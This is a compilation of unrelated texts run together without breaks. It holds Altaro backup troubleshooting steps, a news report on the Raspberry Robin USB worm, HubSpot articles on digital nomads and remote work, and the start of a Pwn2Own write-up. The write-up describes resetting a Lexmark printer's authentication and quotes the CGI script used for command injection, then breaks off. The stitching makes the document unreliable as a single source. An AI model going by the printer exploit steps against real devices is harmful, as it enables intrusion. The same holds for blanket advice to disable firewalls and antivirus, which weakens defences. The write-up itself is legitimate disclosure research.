Firstly, create a folder named “Overrides” in this path: C:\ProgramData\Altaro\AltaroBackupProfile If you’d like to move the temp files on the Altaro Offsite Server, create a folder named “Overrides” in this path: C:\ProgramData\Altaro\AltaroOffsiteServerProfile
Then create a text file named “OverrideTempFolder.txt” inside the newly created folder
In the text file enter the path where you wish to store Altaro’s temp files, for example:{ “TempFolderPathOverride”:”E:\\Temp\\Altaro” }Ensure this location exists & that you use a double backslash as a separator (like above)
Restart all Altaro services and on next Operation, the Altaro temporary files will now be stored in the above directory
7.5 and older
To do so, you can follow these steps:
Ensure you are running at least version 5.0.97
Firstly, create a folder named “Overrides” in this path: C:\ProgramData\Altaro\AltaroBackupProfile If you’d like to move the temp files on the Altaro Offsite Server, create a folder named “Overrides” in this path: C:\ProgramData\Altaro\AltaroOffsiteServerProfile
Then create a text file named “OverrideTempFolder.txt” inside the newly created folder
In the text file enter the path where you wish to store Altaro’s temp files, for example: “E:\AltaroTemp” (without quotes) — ensure this location exists
Restart all Altaro services and on next Operation, the Altaro temporary files will now be stored in the above directory
Tips
ProgramData is a hidden folder by default
Ensure that the file extension is showing, or you might end up with a file named “OverrideTempFolder.txt.txt”
Ensure there are no spaces at the end of the path and no extra line breaks in the text file
If you are running an AntiVirus software or a file-scanning software, we do recommend excluding a couple of directories used by Altaro in order to ensure that it’s operation remains undisrupted.
We do recommend excluding the following:
all onsite backup drive directories
all offsite backup drive directories
C:\ProgramData\Altaro on the Altaro Management and on the Hyper-V hosts
C:\Program Files\Altaro on the Altaro Management and on the Hyper-V hosts
The backup fails with a one of the following errors:
“Windows Error 64: The specified network name is no longer available.”
“Windows Error 59: An unexpected network error occurred.”
CAUSE
There’s a number of reasons that can very easily cause networks issues which will result in a failed backup pointing to a Windows Error 64 or 59. Mainly it could be down to potential hardware failures/issues or even configuration of network devices for that matter.
Aside from that, firewalls, other traffic on the line or other software could be causing load on the network or even on the storage device itself, that might be going over timeouts or maximum retransmission limits.
Sending backups over an unreliable connection such as a VPN/WAN connection can also result in such a failure, unless using the Altaro Offsite Server tool for offsite copies.
Timeouts from specific NAS boxes when using domain credentials can also be causing such disconnections.
SOLUTION
There are numerous, distinct solutions applicable for backups failing with this error, seeing as it could be occurring for a number of reasons.
If you’re using a NAS as a backup location, it’s recommended that you utilise the credentials of the NAS box itself, even if it’s connected to Active Directory. The reason behind this, being that certain NAS’s have a timeout period associated for connections connected via domain credentials, so it could be the cause for the backup failure.
Another point to keep in mind if you’re using a NAS box, is to check whether the particular model you’re using has a sleep/standby option that could be causing such backup failure.
If you have other storage media available, try taking backups to this location, as the previous location may be experiencing hardware or software issues that may only present themselves during backup times. This will serve as a definite confirmation if the issue is with the previously configured location as well as a temporary solution.
If the backup location you have configured is going over an unreliable network, such a VPN/WAN connection, please note that this is not supported. This would only be supported if you’re making use of the Altaro Offsite Server which is only applicable for offsite copies and not primary backups.
If you’re using a backup device, such as a NAS which supports connections via iSCSI it’s recommended to set up the backup location this way. Devices connected via iSCSI usually perform better and in turn offer increased performance.
If the backup device is connected to a different switch to the backup server then it’s best to connect it to the same switch and re-test.
It’s recommended to change the network cables that the backup device and the backup server are connected with; additionally changing the ports on the switch would also be suggested.
Make sure Opportunity Locks (Oplocks) are disabled if the backup location is a NAS
If your backup location is a Windows machine, the equivalent to Oplocks is: Set-SmbServerConfiguration -EnableLeasing 0
Run the above command via Powershell.
It’s also a good idea to reboot the backup device as well as the backup server to clear any open connections and refresh the devices.
SessTimeout Key:HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters\ DWORD: SessTimeoutThe value entered here should be in seconds. You can try entering a value of 300 seconds (5 minutes) or 600 seconds (10 minutes). The default for this is 1 minute. This will increase the time the backup server waits for a response before the connection is aborted.
TcpMaxDataRetransmissions Key:HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters DWORD: TcpMaxDataRetransmissions The value entered here will reflect the number of retries. The default number for this is 5.This will increase the number of tries the TCP retransmission mechanism will attempt to transmit data before the connection is aborted.
If the above does not help and you’re still experiencing issues, it’s recommended to temporarily disable any firewalls and antivirus products on the backup server, the hosts and the backup device. This applies for both software and hardware firewalls.
Microsoft says that a recently spotted Windows worm has been found on the networks of hundreds of organizations from various industry sectors.
The malware, dubbed Raspberry Robin, spreads via infected USB devices, and it was first spotted in September 2021 by Red Canary intelligence analysts.
Cybersecurity firm Sekoia also observed it using QNAP NAS devices as command and control servers (C2) servers in early November [PDF], while Microsoft said it found malicious artifacts linked to this worm created in 2019.
Redmond’s findings align with those of the Red Canary’s Detection Engineering team, which also detected this worm on the networks of multiple customers, some of them in the technology and manufacturing sectors.
Although Microsoft observed the malware connecting to addresses on the Tor network, the threat actors are yet to exploit the access they gained to their victims’ networks.
This is in spite of the fact that they could easily escalate their attacks given that the malware can bypass User Account Control (UAC) on infected systems using legitimate Windows tools.
Microsoft shared this info in a private threat intelligence advisory shared with Microsoft Defender for Endpoint subscribers and seen by BleepingComputer.
Raspberry Robin worm infection flow (Red Canary)
Abuses Windows legitimate tools to infect new devices
As already mentioned, Raspberry Robin is spreading to new Windows systems via infected USB drives containing a malicious .LNK file.
Once the USB device is attached and the user clicks the link, the worm spawns a msiexec process using cmd.exe to launch a malicious file stored on the infected drive.
It infects new Windows devices, communicates with its command and control servers (C2), and executes malicious payloads using several legitimate Windows utilities:
fodhelper (a trusted binary for managing features in Windows settings),
msiexec (command line Windows Installer component),
and odbcconf (a tool for configuring ODBC drivers).
“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” Red Canary researchers explained.
“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
Security researchers who spotted Raspberry Robin in the wild are yet to attribute the malware to a threat group and are still working on finding its operators’ end goal.
However, Microsoft has tagged this campaign as high-risk, given that the attackers could download and deploy additional malware within the victims’ networks and escalate their privileges at any time.
In the Cascade Mountains of Southern Oregon, there sits a volcano with no peak. But what takes the place of a billowing summit isn’t a barren crater — it’s an electric blue lake, surrounded by pine trees and the jagged remains of the volcano’s collapsed mouth, which crumbled during an eruption almost 8,000 years ago.
This place is called Crater Lake. It’s considered one of the most beautiful national parks in the United States. It’s also where Justin Champion, a Content Professor at HubSpot Academy, spent his work day last Thursday.https://www.instagram.com/p/BkTxa6cHCjr/embed/captioned/?cr=1&v=8&wp=648&rd=https%3A%2F%2Fblog.hubspot.com&rp=%2Fmarketing%2Fdigital-nomad#%7B%22ci%22%3A0%2C%22os%22%3A1813.1999999999534%2C%22ls%22%3A1638.5%2C%22le%22%3A1770.9000000001397%7D
A striking landscape, like Crater Lake, is a normal office view for Justin and his wife, Ariele. After working in the National Park, they headed north to Portland and spent a day in Mt. Hood. Then, they drove through Redwood National Park. And next week, they plan to work in Yosemite National Park.
Justin and his wife have been living, working, and traveling across America in a Ford F-250 with an Airstream trailer hitched to its back for the past two years. And their alternative lifestyle has helped them prioritize life experiences and close connections over material possessions. They’re modern day nomads. Or what most people call digital nomads.
What is a Digital Nomad?
Digital nomads are remote workers who usually travel to different locations. They often work in coffee shops, co-working spaces, or public libraries, relying on devices with wireless internet capabilities like smart phones and mobile hotspots to do their work wherever they want.
With 34% of remote employees working 4-5 days a week out of the office, the digital nomad lifestyle could be an exciting possibility if you’ve caught the travel bug and want to break free from the shackles of 9-5 life. Below, we’ll cover the benefits, job opportunities, and realities of this alternative lifestyle.
Let’s find out if it’s the right fit for you.
Living the Dream? 5 Benefits of Being a Digital Nomad
1. You’ll be more productive.
There’s no time to waste when you travel to gorgeous places almost every day. Exploring your new surroundings will motivate you to get your work done as soon as possible. Adventure can be one of the best types of motivation.
2. You’ll have more breakthrough ideas.
Creativity happens when you mash seemingly unrelated concepts together to form a new idea. Neuroscientists call this synaptic play, and the more incongruent the concepts are, the more synapses occur in your brain. Working in a different place everyday gives you a lot of diverse experiences that you call pull from to make these creative connections. And when your brain is chock full of these diverse inputs, your ideas are much more inventive.
3. You’ll become more adaptable.
Constantly traveling to new places pushes you out of your comfort zone. And to adapt to new environments everyday, you need to be willing to engage with different people and cultures. This makes you more open to new experiences in the future.
Traveling also improves your brain’s reaction to change. When you travel, the stress of navigating a foreign place sprouts dendrites in your brain. These dangling extensions increase your brain’s capacity and attentiveness during new and challenging situations in the future.
In a nutshell, traveling strengthens your desire and ability to learn new skills.
4. You’ll have more time to do the things you love.
Even though work can be great, we still work to live, not the other way around. Finishing work faster gives you more time in your schedule to explore your surroundings, do the things you’re passionate about, and spend more time with loved ones.
5. You’ll make lifelong friendships.
Adventure and memorable experiences forge close connections between people. When you embark on your journey, you’ll meet other digital nomads and become friends with them. And if you travel with a friend or significant other, your relationship will be closer than ever before.
Common Jobs for Digital Nomads
Today, most companies embrace remote work. 43% of American employees spent time working remote last year, and this number will only increase. But being a digital nomad and working a few days at home are two different animals. If you want to keep your day job while traveling, you need to prove to your manager that you can handle full-time remote work before you can do work on the road. Justin Champion decided to work remotely for six months before he even asked to travel.
If you’re looking for job, sift through sites that only list remote jobs, like We Work Remotely or Remote.co, and ask prospective employers if the role lends itself to your nomadic lifestyle.
Freelancing is also a common role for digital nomads. Before you embark on your journey, though, you must be realistic with yourself. How will you be able to make a living? Answer the following questions to help you figure this out:
What am I good at?
What do I like to do?
Is there a need for my skill?
Can I do this job online?
Once you know how you’ll be able to make money, you can enter the gig economy by marketing and selling your services on your own, or finding work on a freelance service marketplace like Upwork or Fiverr.
Whether you chose to work for a company or yourself, becoming a digital nomad doesn’t mean pigeonholing yourself in a specific role. Your job just has to be fully digital. Listed below are some common roles that lend themselves well to a fully remote lifestyle:
Accounting
Customer Service
Design
Editing
Healthcare
IT
Marketing
Project Management
Quality Analyst (QA)
Recruiting & HR
Sales
Software Development
Teacher/Tutor
Transcription
Virtual Assistant
Writing
As you can see, there’s a lot of different industries and roles for digital nomads. Remote work is becoming commonplace, which is exciting and beneficial for the workforce. But that doesn’t mean anyone and everyone should be a digital nomad. It’s still a tough challenge. You need to be organized and disciplined, or you won’t be able to enjoy your travels — which is the point of the lifestyle, right? So how do you set yourself up for success?
How Do You Become a Digital Nomad? 5 Things to Consider Before You Get Started
1. Get rid of unnecessary expenses.
Paying for things that don’t greatly impact your life is never ideal. That’s why you need to get rid of all the expenses that you won’t need living as a digital nomad. Things like gym memberships, subscriptions, and debt are all expenses that’ll bog you down on the road. And if you’re a freelancer, they’ll be even more of a burden because you might experience some periods of inconsistent income. Getting rid of these expenses and paying off debt will allow you to fully focus on your work and travels.
2. Make sure you have income you can rely on for months in advance.
Whatever lifestyle you pursue, it’s always smart to have safety net. You never know when an emergency will arise. This rings especially true when you’re a digital nomad because you’re mostly own your own. You can’t find solace in a warm, comfortable home or family, and if you’re freelancer, you don’t have the luxury of a consistent paycheck. To widen your safety net, you should sell any unnecessary belongings, move the essentials into a storage unit, sell or rent your house, and save as much money as possible.
3. Get travel health insurance.
Traveling can give you some of the best experiences in your life, but it not always a blissful, perpetual highlight reel. It’s still real life. You’ll get sick, have emergencies and accidents, and need regular checkups. You also need immunizations to enter certain parts of the world. Your health should be your number one priority during your travels, so make sure you buy a solid health insurance plan that’s valid in all the places you visit.
4. Set yourself up for financial success.
Ample funds are the key to successful travel. American credit cards will usually charge you a fee if you use it abroad, so ask your bank for an international credit card. You should also sign up for credit monitoring services that’ll alert you if anyone tries to steal your identity.
5. If you travel internationally, unlock your phone.
Most countries have different cell phone carriers, so if you want to bounce from country to country, you need to call your current carrier and ask them to unlock your phone. You’ll be able to use your phone in any country because you can put a different sim card in your phone from each international carrier you use.
Once you square these things away, it’s time to start your new life on the road. But actually living life as a digital nomad is an entirely different ballgame than preparing to be one.
7 Tips for Living as a Digital Nomad
1. Make a budget.
As a digital nomad, your budget should be your bible. And if you follow it, you can live quite comfortably. To create a successful budget, calculate your living expenditures, the cost of traveling to each destination, staying there, the activities you’ll do there, the costs of working, and how it all affects your savings if you can’t earn a salary for a while.
2. Plan for the worst-scenario.
When you live abroad, It’s crucial to have multiple backup plans in case of any emergencies. Nothing really ever works out the way it’s supposed to. Things happen. What if your truck breaks down? Or what if you get stuck in a foreign country with no backup plan? What’s your plan B and C? You need to set these processes in place to handle the inevitable bumps in the road.
3. Join a digital nomad community.
Digital Nomad communities like Couchsurfing and Nomadlist will help you learn the nuances of the digital nomad lifestyle, and reduce its steep learning curve. Fellow nomads will be happy to answer any pressing questions about your new lifestyle and any areas you plan to visit. They’ll also teach you how to work effectively on the road. And arguably the most beneficial perk of these communities is that you can connect with other traveling professionals, which can lead to new business opportunities, partnerships, and friendships.
4. Make sure you have cell reception or wifi.
If your employer lets you work remotely, show them and your team some respect by being available as much as possible online. Not having wifi or cell phone reception should never be an excuse for missing a meeting or failing to get an assignment done. The same goes for client work, if you’re a freelancer.
To make sure you’ll always have internet connection, consider investing in a cell phone booster and a mobile hotspot mifi device. Cell phone boosters can detect the smallest shred of cell phone reception and send the signal to your vehicle. Mobile hotspot mifi devices strengthen your mobile hotspot service, so you don’t have to rely on a spotty, public wifi connection.
5. Make sure you can communicate with locals.
Knowing the language of the country you’re going to or knowing that they speak your language is crucial for successful travel. Assuming that there has to be someone who will understand English is a dangerous move. But if you must go to a place where you don’t know the native language or they don’t speak yours, use Google Translate or another translation app to navigate your new environment.
6. Research your destinations.
If you’re not living in an RV, find affordable housing on AirBnB or Couchsurf before you arrive to your destination. And make sure your lodging is near a hospital, emergency room or clinic in case of an emergency. You should also research the area to find safe neighborhood to stay in.
7. Draw cash from ATMs.
Airports are notorious for charging ridiculously high currency exchange fees. If you need cash, draw it from an ATM. Your bank will charge you a fee, but it’ll be much lower than the one at the currency exchange desk.
Before you set off …
If an adventurous lifestyle sounds appealing to you, then being a digital nomad can be one of the most rewarding yet challenging ways to live. But if you arm yourself with organization, discipline, and a thirst for learning, you could enjoy an exciting and fulfilling life on the road. Just ask Justin and Ariele Champion. They’re living the alternative American Dream. And they’ve never looked back.
Working from home is awesome, right up until the cat throws up on your computer. And your neighbor, who you can only assume is building a time machine, starts firing up all sorts of power tools and noisy machinery across the street.
COVID-19 has caused remote work to become a necessity instead of a luxury for many professionals. But which environment allows us to be more productive: the home office or the office office?
In the office office, your colleagues often pose the greatest threat to keeping you from getting some real, heads-down work done. They drop by your desk, engage you in conversation, and invite you to lunch — or so I hear. The social benefits are nice to have, but they can become a challenge if you’re easily distracted.
However, at the home office, while family members can be a distraction, I find that it’s easy for you to become your own worst enemy. Because without coworkers around, you’re free to drop those pesky inhibitions. At the home office, no one’s watching. You don’t necessarily feel that same peer pressure or communal obligation to get stuff done. (Also, you don’t have to wear pants.)
Below, I’ve compiled many great work-at-home tips and tricks from some of my awesome coworkers.
How to Work From Home
Communicate expectation with anyone who will be home with you.
Take clear breaks.
Interact with other humans.
Prepare meals the night before.
Pick a definitive finish time.
Eat and sleep.
Talk to your employer.
Join a remote-friendly company.
Start a career as a freelancer.
Start a home business.
1. Communicate expectations with anyone who will be home with you.
Of course, you might be working from home but still have “company.” Make sure any roommates, family members, and dogs (well, maybe not dogs) respect your space during work hours. Just because you’re working from home doesn’t mean you’re home.
If you share space with another work-from-home adult, you may have to lay ground rules about meeting times, shared desks and chairs, and quiet times.
CEO Sam Mallikarjunan tells how he manages to get work done even when people are around.
“If anyone else is going to be at home when you’re working, they just have to be clear that when you’re in your ‘office’ (in my case, my signal to the family is having headphones on), you’re working — even if it looks like and feels like you’re hanging out at home.”
He continues, “It’s easy to get distracted by the many things that have to be done around the house during the day.”
2. Take clear breaks.
It can be so easy to get distracted as a telecommuter that you avoid breaks altogether. Don’t let the guilt of working in the building you sleep in prevent you from taking five minutes to relax.
However rather than just opening YouTube and watching some comfort clips, use your breaks to get away from your desk. Go for a walk, enjoy fresh air, or spend time with others who might also be in the house.
Take Ginny Mineo‘s advice. “Breaks, like making and eating lunch, can recharge you to do better work. Don’t assume you need to be working 100% of the time while you’re home to be more productive.”
3. Interact with other humans.
When your office starts working from home, you’ll likely miss the casual social interactions with colleagues you’re used to throughout the day. When working from home, you don’t have the small talk and other activities that make each day at the office unique.
So what can you do? Communicate.
Fight boredom and loneliness by frequent communication with other employees. Reach out to them through video chat via apps like Zoom and Slack, a hosted phone system, or however else your company communicates.
Remember: You’re working from home, not the moon. Interacting with other people during the day is allowed, even if they’re not your colleagues. It’s a good idea to see another face during the day when most of your workday is solitary. So, use your breaks to interact with others.
“Go outside and find a human to interact with — ordering your coffee, running an errand, whatever. It keeps you sane.”
When you’re in your own home, it can be tempting to spend time preparing a nice breakfast and lunch for yourself, chopping and cooking included. Don’t use precious minutes making your food the day of work — cook it the night before.
Preparing food ahead of time ensures you can use your meal times to eat and that you aren’t performing non-work tasks that spend energy better used at your desk.
Digital marketing strategist, Lindsay Kolowich, adds, “Cooking at home is time you wouldn’t have spent meal prepping if you’d been in the office that day, and I find the minutes can add up in the end. To mitigate that, I try to cook and prep my meals the night before, just like I would for a day at the office.“
5. Pick a definitive finishing time.
You might be under the impression that working from home establishes more work-life balance, but be careful with that assumption.
Working from home can also feel like being at a casino — you can get so caught up in your activity, in a relaxing environment, that you lose complete track of time.
“If you work from home full-time (or regularly), it’s really easy to let your work life bleed into your personal life,” says Tyler Littwin.
He continues, “Maintaining a boundary is important for both halves of the equation.”
In lieu of coworkers, whose packing up and leaving the office reminds you to do the same, set an alarm at the end of the day to indicate your normal workday is coming to an end. You don’t have to stop at exactly that time, but knowing the workday is technically over can help you start the process of saving your work and calling it quits for the evening.
6. Eat and sleep.
What is the biggest perk to working from home? One of the biggest benefits for some people (me), is complete access to the kitchen.
As soon as I take a break, I automatically drift towards the kitchen for some snacks.
An unhealthy diet can affect productivity and drain energy. When I switched to a healthier diet, it made me function better and get the most from my routine.
So eat well when working from home.
It’s also vital that you keep to a proper sleep schedule. Save binge-watching your favorite shows for the weekend. With the right food to keep energy levels high and sound sleep to refresh your body and mind, you can make a success of working from home.
7. Talk to your employer.
If you like your current job and don’t want to change it, the obvious step is to find a way to pivot the position.
One of the tips for doing this is folding the possibility of going remote into your next promotion cycle. Talk to your boss often about your intention to pivot.
And, if you’re not sure your employer will agree to working completely remotely, talk about the option of working remotely one or two days a week. When you use the work from home tips we’ve provided above, and your boss sees how productive you are, they could allow you more days to work from home.
8. Join a remote-friendly company.
If your work can be done remotely, but your current boss or organization doesn’t allow you to work from home, you might need to get a new job.
When looking for a work-from-home job, you can use the same methods you used in finding your regular office job. This includes channels like job sites, local job ads, and social media platforms.
Check out these firms to see whether you meet the requirements to start working remotely for them.
9. Start a career as a freelancer.
If your current job isn’t remote work-friendly, you can go remote by starting your own business as a freelancer or a consultant.
Depending on the nature of your current job, you may start your own freelance business while still being employed.
The benefit of starting your freelance business while still employed is that it reduces the financial strain experienced by any new business.
10. Start a home business.
Starting a home business is one way to enjoy remote work.
Unlike other fields, certifications and education are not usually prerequisites. Instead, researching, having a smart business plan, and choosing the right business is more essential to the success of your business.
You can find more work-from-home tips in the books listed in this best remote work books article.
Working From Home Tips
Get started early.
Pretend like you are going into the office.
Structure your day like you would in the office.
Choose a dedicated workspace
Don’t stay at home.
Make it harder to use social media.
Commit to doing more.
Work when you’re at your most productive.
Save calls for the afternoon.
Focus on one distraction.
Plan out what you’ll be workign on ahead of time.
Use technology to stay connected.
Match your music to the task at hand.
Use laundry as a work timer.
1. Get started early.
When working in an office, your morning commute can help you wake up and feel ready to work by the time you get to your desk. At home, however, the transition from your pillow to your computer can be much more jarring.
Believe it or not, one way to work from home productively is to dive into your to-do list as soon as you wake up. Simply getting a project started first thing in the morning can be the key to making progress on it gradually throughout the day. Otherwise, you’ll prolong breakfast and let the morning sluggishness wear away your motivation.
Lindsay Kolowich says, “When I work from home, I wake up, put on a pot of coffee, and start working immediately — much earlier than normal working hours. I only start making breakfast once I’ve hit a wall or need a break. I’m a morning person and find I can get a ton done in the early morning hours, so this works really well for me.”
2. Pretend like you are going into the office.
The mental association you make between work and an office can make you more productive, and there’s no reason that feeling should be lost when working remotely.
I know that you love working in your pajamas (I do, too), but the mere act of changing clothes to something more serious will give you a signal to get work done throughout the day.
When you dress up, you give your brain a reason for dressing up, and it can keep you pumped throughout your work hours.
So when working from home, do all the things you’d do to prepare for an office role: Set your alarm, make (or get) coffee, and wear nice clothes.
Internet browsers like Google Chrome even allow you to set up multiple accounts with different toolbars on the top — for example, a toolbar for home and a separate toolbar for work.
Take to heart the words of HubSpot graphic designer, Anna Faber-Hammond, who says, “Get fully ready for the day and pretend you’re actually going to work. Otherwise, you might find yourself back in bed.”
3. Structure your day like you would in the office.
When working from home, you’re your own personal manager and can choose your working hours.
However, without things like an in-person meeting schedule to break up your day, you can easily lose focus or burn out.
To stay on schedule, segment what you’ll do and when for the day. If you have an online calendar, create personal events and reminders that tell you when to shift gears and start on new tasks. Google Calendar makes this easy.
Structuring your day as you would in the office also saves you from work creep. With this structure in place, working from home will not cause your work to invade your personal life.
“Are mornings for writing while you’re in the office? Use the same schedule at home. This structure will help keep you focused and productive.” – Ginny Mineo
4. Choose a dedicated workspace.
Just because you’re not working at an office doesn’t mean you can’t, well, have an office. Rather than cooping yourself up in your room or on the couch in the living room — spaces associated with leisure time — dedicate a specific room or surface in your home to working remotely.
No matter the space or location, have an area of the home to work and stay committed to throughout the day. And, after choosing your dedicated workspace, make the most of it by making it quiet.
CEO, Sam Mallikarjunan says, “Have a place you go specifically to work. It could be a certain table, chair, local coffee shop — some place that’s consistently your ‘workspace.’ It helps you get into the right frame of mind.”
5. Don’t stay at home.
Is your home office just not getting it done for you? Take your work-from-home life a step further and get out of the house. Coffee shops, libraries, public lounges, and similar Wi-Fi-enabled spaces can help you simulate the energy of an office so you can stay productive even when you don’t sit in an official workplace.
Content marketer, Corey Wainwright, comments, “I get out of my home to work and go to an establishment with actual tables, chairs, and people. It helps simulate the work environment and removes the distractions I typically have at home, like the urge to finally clean my room, do laundry, or watch TV. “
6. Make it harder to use social media.
Social media is designed to make it easy for us to open and browse quickly. As remote workers, though, this convenience can be the detriment of our productivity.
To counteract your social networks’ ease of use during work hours, remove them from your browser shortcuts and log out of every account on your phone or computer.
You might even consider working primarily in a private (or, if you’re using Chrome, an “Incognito”) browser window. This ensures you stay signed out of all your accounts, and each web search doesn’t autocomplete the word you’re typing. It’s a guarantee that you won’t be tempted into taking too many social breaks during the day.
Also, many have found it helpful to shut off social media notifications during the hours they work from home.
Alec Biedrzycki, product marketer at AirTable, says, “I remove all social networks from my toolbar bookmarks… you can get sucked in without knowing it, so eliminating the gateway to those networks keeps me on track.”
7. Commit to doing more.
Projects always take longer than you initially think they will. For that reason, you’ll frequently get done less than you set out to do.
So, just as you’re encouraged to overestimate how much work hours you’ll spend doing one thing, you should also overestimate how many things you’ll do during the day.
Even if you come up short of your goal, you’ll still come out of that day with a solid list of tasks filed under ‘complete.’
“On days I’m working from home, I tend to slightly overcommit on what I’ll deliver that day. So even if I get the urge to go do something else, I know I’ve already committed a certain amount of work to my team.”- Corey Wainwright
8. Work when you’re at your most productive.
Nobody sprints through their work from morning to evening — your motivation will naturally ebb and flow throughout the day. However, when you’re working from home, it’s all the more important to know when those ebbs and flows will take place and plan your schedule around it.
To capitalize on your most productive periods, save your more challenging tasks for when you know you’ll be in the right headspace for them. Use slower points of the day to knock out the easier logistical tasks on your plate.
Verily Magazine calls these tasks “small acts of success,” and they can help build your momentum for the heavier projects that are waiting for you later on.
Product designer, Brittany Leaning, says about her routine, “For me, the most productive times of the day are usually early in the morning or late at night. I recognize this and try to plan my day accordingly. Also, music that pumps me up doesn’t hurt.”
The responsibility is on you to know when you are most productive and build your work schedule around the periods of maximum productivity.
9. Save calls for the afternoon.
Sometimes, I’m so tired in the morning, that I don’t even want to hear my voice — let alone talk to others with it.
You shouldn’t have to give yourself too much time to become productive in the morning, but you can give yourself some extra time before working directly with others.
If you’re struggling to develop a reasonable work schedule for yourself as a telecommuter, start with the solitary tasks in the morning.
Save your phone calls, meetings, Google hangouts meetings, video call, and other collaborative work for when you’ve officially “woken up.”
Senior Marketing Director, James Gilbert, advises that you “Take advantage of morning hours to crank through meaty projects without distractions, and save any calls or virtual meetings for the afternoon.”
10. Focus on one distraction.
There’s an expression out there that says, “if you want something done, ask a busy person.”
The bizarre but true rule of productivity is that the busier you are, the more you’ll do.
It’s like Newton’s law of inertia: If you’re in motion, you’ll stay in motion. If you’re at rest, you’ll stay at rest. And busy people are in fast-enough motion that they have the momentum to complete anything that comes across their desk.
Unfortunately, it’s hard to find things to help you reach that level of busyness when you’re at home — your motivation can just swing so easily. HubSpot’s principal marketing manager, Pam Vaughan, suggests focusing on something that maintains your rhythm (in her case, it’s her daughter).
She says, “When I work from home, my 20-month-old daughter is home with me, too. It seems counterintuitive, but because I have to manage taking care of her and keeping her happy and entertained while still getting my work done, the pressure helps to keep me focused. When she’s napping or entertaining herself, I go into super-productive work mode.
The ‘distraction’ of my daughter (I mean that in the most loving way possible) means I can’t possibly succumb to some of the other common distractions of home.”
11. Plan out what you’ll be working on ahead of time.
Spending time figuring out what you’ll do today can take away from actually doing those things. And, you’ll have planned your task list so recently that you can be tempted to change your schedule on the fly.
It’s important to let your agenda change if you need it to, but it’s equally important to commit to a schedule that outlines every assignment before you begin.
Try solidifying your schedule the day before, making it feel more official when you wake up the next day to get started on it.
“Plan out your week in advance to optimize for the environments you’ll be in.”- Niti Shah
12. Use technology to stay connected.
Working from home might make you feel cut off from the larger operation happening in your company.
Instant messaging and videoconferencing tools like Slack and Zoom can make it easy to check in with other remote employees and remind you how your work contributes to the big picture.
It’s also vital to invest in the right technology. For instance, a bad-performance router can take the steam right off your enthusiasm to work, so it’s better to invest in a high-performance router.
CMO and former HubSpot employee, Meghan Keaney Anderson, remarks, “At HubSpot, we use Slack to keep conversations going remotely, Trello to keep us organized around priorities, and Google Hangouts plus Webex to make remote meetings more productive. Getting the right stack of support tools to fit your work style makes a big difference.”
13. Match your music to the task at hand.
During the week, music is the soundtrack to your career (cheesy, but admit it, it’s true). And at work, the best playlists are diverse playlists — you can listen to music that matches the energy of the project you’re working on to boost your productivity.
Video game soundtracks are excellent at doing this. In the video game, the lyric-free music is designed to help you focus; it only makes sense that it would help you focus on your work.
Want some other genres to spice up your routine and make you feel focused? Take them from startup marketer, Ginny Mineo, who offers her work music preferences below.
“When I’m powering through my inbox, I need some intense and catchy rap/R&B (like Nicki Minaj or Miley Cyrus) blasting through my headphones, but when I’m writing, Tom Petty is the trick. Finding what music motivates and focuses me for different tasks (and then sticking to those playlists for those tasks) has completely changed my WFH productivity.”
14. Use laundry as a work timer.
You might have heard that listening to just two or three songs in the shower can help you save water. And it’s true; hearing a few of your favorite songs start and end, one after another, can remind you how long you’ve been in the bathroom and shorten your wash time.
Why bring this up? Because the same general principle can help you stay on task when working from home. But instead of three songs off your music playlist, run your laundry instead.
Doing your laundry is a built-in timer for your home. So, use the time to start and finish something from your to-do list before changing the load.
Committing to one assignment during the wash cycle and another during the dry process can train you to work smarter on tasks that you might technically have all day to tinker with. And when you know there’s a timer, it makes it hard for distractions to derail your work.
People ops manager, Emma Brudner, notes, “I also usually do laundry when I work from home, and I set mini-deadlines for myself corresponding to when I have to go downstairs to switch loads. If I’m working on an article, I tell myself I’ll get to a certain point before the wash cycle ends. Then I set another goal for the dryer.”
Staying Productive While Working From Home
While you might miss the office, working full time from home can be good for you.
For one, you don’t have to worry about commuting every day and you can better care for your loved ones by being around more often.
The work from home tips that we have provided can help you make the most of your new routine. Try out a few and you might find that you’re just as productive working from home as you are in the office.
In August 2021, ZDI announced Pwn2Own Austin 2021, a security contest focusing on phones, printers, NAS devices and smart speakers, among other things. The Pwn2Own contest encourages security researchers to demonstrate remote zero-day exploits against a list of specified devices. If successful, the researchers are rewarded with a cash prize, and the leveraged vulnerabilities are responsibly disclosed to the respective vendors so they can improve the security of their products.
After reviewing the list of devices, we decided to target the Cisco RV340 router and the Lexmark MC3224i printer, and we managed to identify several vulnerabilities in both of them. Fortunately, we were luckier than last year and were able to participate in the contest for the first time. By successfully exploiting both devices, we won $20,000 USD, which CrowdStrike donated to several charitable organizations chosen by our researchers.
In this blog post, we outline the vulnerabilities we discovered and used to compromise the Lexmark printer.
Overview
Product
Lexmark MC3224
Affected Firmware Versions (without claim for completeness)
Step #1: Increasing Attack Surface via Authentication Reset
Before we could start our analysis, we first had to obtain a copy of the firmware. It quickly turned out that the firmware is shipped as an .fls file in a custom binary format containing encrypted data. Luckily, a detailed writeup on the encryption scheme had been published in September 2020. While the writeup did not include code or cryptographic keys, it was elaborate enough that we were able to quickly reproduce it and write our own decrypter. With our firmware decryption tool at hand, we were finally able to peek into the firmware.
It was assumed that the printer would be in a default configuration during the contest and that the setup wizard on the printer had been completed. Thus, we expected the administrator password to be set to an unknown value. In this state, unauthenticated users can still trigger a vast amount of actions through the web interface. One of these is Sanitize all information on nonvolatile memory. It can be found under Settings -> Device -> Maintenance. There are several options to choose from when performing that action:
[x] Sanitize all information on nonvolatile memory
(x) Start initial setup wizard
( ) Leave printer offline
[x] Erase all printer and network settings
[x] Erase all shortcuts and shortcut settings
[Start] [Reset]
If the checkboxes are ticked as shown, the process can be initiated through the Start button. The printer’s non-volatile memory will be cleared and a reboot is initiated. This process takes approximately two minutes. Afterward, unauthenticated users can access all functions through the web interface.
Step #2: Shell Command Injection
After resetting the nvram as outlined in the previous section, the CGI script https://target/cgi-bin/sniffcapture_post becomes accessible without authentication. It was previously discovered by browsing the decrypted firmware and is located in the directory /usr/share/web/cgi-bin.
At the beginning of the script, the supplied POST body is stored in the variable data. Afterward, several other variables such as interface, dest, path and filter are extracted and populated from that data by using sed:
read data
remove=${data/*-r*/1}
if [ "x${remove}" != "x1" ]; then
remove=0
fi
interface=$(echo ${data} | sed -n 's|^.*-i[[:space:]]\([^[:space:]]\+\).*$|\1|p')
